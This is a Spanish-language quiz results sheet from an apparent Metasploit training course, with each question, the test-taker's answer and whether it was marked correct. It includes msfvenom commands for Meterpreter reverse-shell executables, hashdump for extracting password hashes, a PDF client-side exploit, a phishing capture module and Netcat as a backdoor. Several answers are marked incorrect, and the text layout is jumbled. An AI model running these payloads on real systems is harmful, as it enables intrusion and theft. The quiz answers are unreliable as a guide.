Está en la página 1de 6

Resultados

Estas son las preguntas del examen que has realizado y sus resultados

Pregunta Tu respuesta Resultado


Meterpreter es una
herramienta incluida
A bajo nivel y asi conseguir una mayor evasion ante
en Metasploit Correcto
sistemas de protección
Framework que se
ejecuta...
Una de las
herramientas
incluidas en
Metasploit
Para una vez comprometido un sistema dejar una
Framework es Netcat,
puerta trasera (Backdoor) y asi asegurarnos la Correcto
¿para que se usa esta
conexión con esta
herramienta en
Metasploit
Framework
mayormente?
¿Una vez arrancado el
entorno de consola de
Metasploit
Framework, con que ?, show, help Incorrecto
comando veremos los
comandos propios de
esta herramienta?
¿Uno de los mejores
interfaces gráficos
para Metasploit
Framework se llama
hosts Correcto
Armitage, en el menú
de este, ¿en qué
pestaña añadiríamos
los objetivos?
¿Qué comando
usaríamos si
quisiésemos que
Metasploit
Framework nos search encoders Incorrecto
mostrase únicamente
los encoders incluidos
en Metasploit
Framework?
¿Qué selección de las use auxiliary/server/capture/http_basic Correcto
siguientes nos valdría
para ejecutar un
ataque por medio de
"phishing" desde la
Pregunta Tu respuesta Resultado
herramienta de
Metasploit
Framework?
La herramienta
integrada en
Metasploit
Por medio de diferentes técnicas incluidos ataques
Framework
por diccionarios y enfocada unicamente a ataques de Correcto
denominada Jhon the
fuerza bruta OFFLINE
ripper esta enfocada a
ataques de
contraseñas...:
Nessus es un escáner
de vulnerabilidades
enfocado a sistemas,
es decir, servidores,
PC, etc, ¿cómo nessus_help Correcto
obtendríamos la
ayuda de este desde la
consola de Metasploit
Framework?
¿Con qué opción
podríamos usar al
escáner de puertos y
servicios Nmap para --script-vuln Correcto
detectar las
vulnerabilidades mas
conocidas?
El comando
"RHOST" hace Remote Host Correcto
referencia a:
Cual seria el exploit
correcto para generar
un ataque del lado del
exploit/windows/fileformat/adobe_utilprintf Correcto
cliente mediante un
archivo con formato
PDF?:
Basándonos en la
pregunta anterior (19)
con que opción
añadiríamos algún -e Correcto
encoder a la creación
de un ejecutable para
Linux:
¿Qué exploit Multi Handler Correcto
usaremos para la
configuración y
recepción de las
maquinas
Pregunta Tu respuesta Resultado
comprometidas?
¿Qué es un Correcto
Una herramienta enfocada a auditores de seguridad y
Metasploit
Hackers éticos.
Framework?
msfvenom -a x86 --platform windows -p
windows/meterpreter/reverse_tcp
De las siguientes LHOST=192.168.1.101 -f exe -o Meterpreter.exe,
configuraciones de la msfvenom -a x86 --platform windows -p
herramienta windows/reverse_tcp LRHOST=192.168.1.101 -f exe Incorrecto
"Msfvenom" cual/es -o Meterpreter.exe, msfvenom -a x86 --platform
son correctas: windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.101 -b "\x00" -f exe -o
Meterpreter.exe
¿Cómo detendríamos
la base de datos de
Postgresql que
anteriormente systemctl stop postgresql Correcto
ejecutamos para hacer
uso de Metasploit
Framework?
Una de las siguientes
técnicas una vez
invadido un sistema,
es la escalada de
ninguna Incorrecto
privilegios, que
extensión deberíamos
cargar para ejecutar
este ataque?:
Que comando
ejecutaríamos en
Metasploit
Framework para ver
la versión del vulns Incorrecto
software y la cantidad
de exploits, encoders,
payloads, etc, que
contiene esta:
Para ejecutar un
escaneo de puertos
con Nmap dentro de
Metasploit
Framework, ¿cómo
db_nmap Correcto
usaríamos esta
herramienta para
trabajar insitu con
Metasploit
Framework?
¿Con que comando de hashdump Correcto
Pregunta Tu respuesta Resultado
Meterpreter
obtendríamos
contraseñas cifradas
del sistema?

Resultados

Estas son las preguntas del examen que has realizado y sus resultados

Pregunta Tu respuesta Resultado


¿Cómo buscaríamos un payload
en concreto, por ejemplo el search meterpreter Correcto
conocido Meterpreter?
¿Con que comando de
Meterpreter obtendríamos hashdump Correcto
contraseñas cifradas del sistema?
Un codificador de código para evadir
Que es un encoder: Correcto
sistemas de protección como antivirus, etc.
¿Uno de los mejores interfaces
gráficos para Metasploit
Framework se llama Armitage,
hosts Correcto
en el menú de este, ¿en qué
pestaña añadiríamos los
objetivos?
¿Qué comando usaríamos si
info
quisiésemos obtener información Correcto
exploit/windows/smb/ms03_049_netapi
de un exploit en concreto?
En Kali Linux, cual seria el
comando corrector para
ls /usr/share/metasploit-
visualizar los exploits de Correcto
framework/modules/exploits/
Metasploit Framework en
nuestro equipo:
Una vez ejecutado el "sniffer" en
la maquina victima, ¿qué
comando deberemos ejecutar sniffer_dump (tarjeta de red)
Correcto
para que esta nos descargue y /ruta/capura.pcap
guarde el resultado del trafico
capturado?
Cual seria el exploit correcto
para generar un ataque del lado exploit/windows/fileformat/adobe_utilprin
Correcto
del cliente mediante un archivo tf
con formato PDF?:
Que comando ejecutaríamos en
Metasploit Framework para ver
la versión del software y la info Incorrecto
cantidad de exploits, encoders,
payloads, etc, que contiene esta:
Pregunta Tu respuesta Resultado
Una vez configurado un exploit
con su correspondiente Payload,
run, launch Incorrecto
que comando usaremos para
lanzarlo?:
A la hora de generar un script
con formato *.rc (resources
script) para la ejecución del
exploit multihandler y asi recibir msfconsole -R meterpreter.rc Incorrecto
las conexiones de las maquinas
victimas, ¿cómo se ejecutaría
éste con Metasploit Framework?:
¿Cómo detendríamos la base de
datos de Postgresql que
anteriormente ejecutamos para systemctl stop postgresql Correcto
hacer uso de Metasploit
Framework?
Una de las herramientas
incluidas en Metasploit
Para una vez comprometido un sistema
Framework es Netcat, ¿para que
dejar una puerta trasera (Backdoor) y asi Correcto
se usa esta herramienta en
asegurarnos la conexión con esta
Metasploit Framework
mayormente?
¿Para que sirve Metasploit Para descubrir sistemas, auditarlos y
Correcto
Framework? posteriormente explotarlos.
Como generaríamos con la msfvenom -p
herramienta Msfvenom una linux/x86/meterpreter/reverse_tcp
Incorrecto
backdoor para un sistema basado RHOST=RPORT LPORT=IP -f exe >
en Debian: shell.exe
¿Una vez arrancado el entorno
de consola de Metasploit
Framework, con que comando show, help Incorrecto
veremos los comandos propios
de esta herramienta?
La herramienta integrada en
Por medio de diferentes técnicas incluidos
Metasploit Framework
ataques por diccionarios y enfocada
denominada Jhon the ripper esta Correcto
unicamente a ataques de fuerza bruta
enfocada a ataques de
OFFLINE
contraseñas...:
Una vez seleccionado un escáner
con el comando "use
(portscan)"Cual seria una
configuración básica en el set RHOSTS (IP), set PORTS 1-65535, set
Correcto
siguiente escaner de Metasploit THREADS 5
Framework
"auxiliary/scanner/portscan/tcp"?
:
¿Qué exploit usaremos para la shell Incorrecto
configuración y recepción de las
Pregunta Tu respuesta Resultado
maquinas comprometidas?
msfvenom -a x86 --platform windows -p
windows/meterpreter/reverse_tcp
De las siguientes LHOST=192.168.1.101 -f exe -o
configuraciones de la Meterpreter.deb, msfvenom -a x86
Incorrecto
herramienta "Msfvenom" cual/es --platform windows -p
son correctas: windows/reverse_tcp
LRHOST=192.168.1.101 -f exe -o
Meterpreter.exe

También podría gustarte